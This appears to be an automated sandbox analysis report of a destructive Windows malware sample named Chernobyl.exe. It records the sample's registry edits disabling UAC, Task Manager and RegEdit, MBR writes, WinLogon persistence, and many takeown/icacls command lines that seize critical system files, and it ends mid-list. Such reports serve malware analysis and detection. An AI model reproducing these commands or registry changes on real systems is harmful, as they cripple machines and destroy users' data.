Analysis Overview
SHA256
bab3c6bad2a2b69ed5a4162d0645ce78f48aa9d9f0736f20a0dd4abc460b4d6a
Threat Level: Known bad
The file Chernobyl.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
UAC bypass
Modifies WinLogon for persistence
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Possible privilege escalation attempt
Modifies system executable filetype association
Checks computer location settings
Modifies file permissions
Modifies WinLogon
Checks whether UAC is enabled
Writes to the Master Boot Record (MBR)
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
System policy modification
Suspicious use of WriteProcessMemory
Modifies File Icons
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-01 20:59
Signatures
Contains code to disable Windows Defender
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 20:59
Reported
2024-06-01 21:01
Platform
win10v2004-20240508-en
Max time kernel
114s
Max time network
64s
Command Line
Signatures
Contains code to disable Windows Defender
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\kill.ico | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\System32\clutter.ico | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\System32\wallpaper.jpg | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| File opened for modification | C:\Windows\cluttscape.exe | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Enumerates physical storage devices
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe
"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\csrss.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\csrss.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\wininit.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\lsass.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\lsass.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\services.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\services.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winlogon.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winlogon.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.efi
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.efi /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\winload.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\winload.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\ntoskrnl.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\svchost.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\3ware.sys && icacls C:\Windows\System32\drivers\3ware.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\SysWOW64\svchost.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AcpiDev.sys && icacls C:\Windows\System32\drivers\AcpiDev.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpiex.sys && icacls C:\Windows\System32\drivers\acpiex.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\1394ohci.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipagr.sys && icacls C:\Windows\System32\drivers\acpipagr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpitime.sys && icacls C:\Windows\System32\drivers\acpitime.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Acx01000.sys && icacls C:\Windows\System32\drivers\Acx01000.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\3ware.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AcpiDev.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp80xx.sys && icacls C:\Windows\System32\drivers\adp80xx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpiex.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpi.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\3ware.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AcpiDev.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpipagr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpipmi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpitime.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afunix.sys && icacls C:\Windows\System32\drivers\afunix.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Acx01000.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Acx01000.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpiex.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\afd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpipagr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ahcache.sys && icacls C:\Windows\System32\drivers\ahcache.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpitime.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\adp80xx.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\afunix.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdgpio2.sys && icacls C:\Windows\System32\drivers\amdgpio2.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\afunix.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\adp80xx.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\agilevpn.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdi2c.sys && icacls C:\Windows\System32\drivers\amdi2c.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ahcache.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdgpio2.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ahcache.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdgpio2.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdi2c.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdk8.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdi2c.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdppm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsata.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\applockerfltr.sys && icacls C:\Windows\System32\drivers\applockerfltr.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsbs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdxata.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppVStrm.sys && icacls C:\Windows\System32\drivers\AppVStrm.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
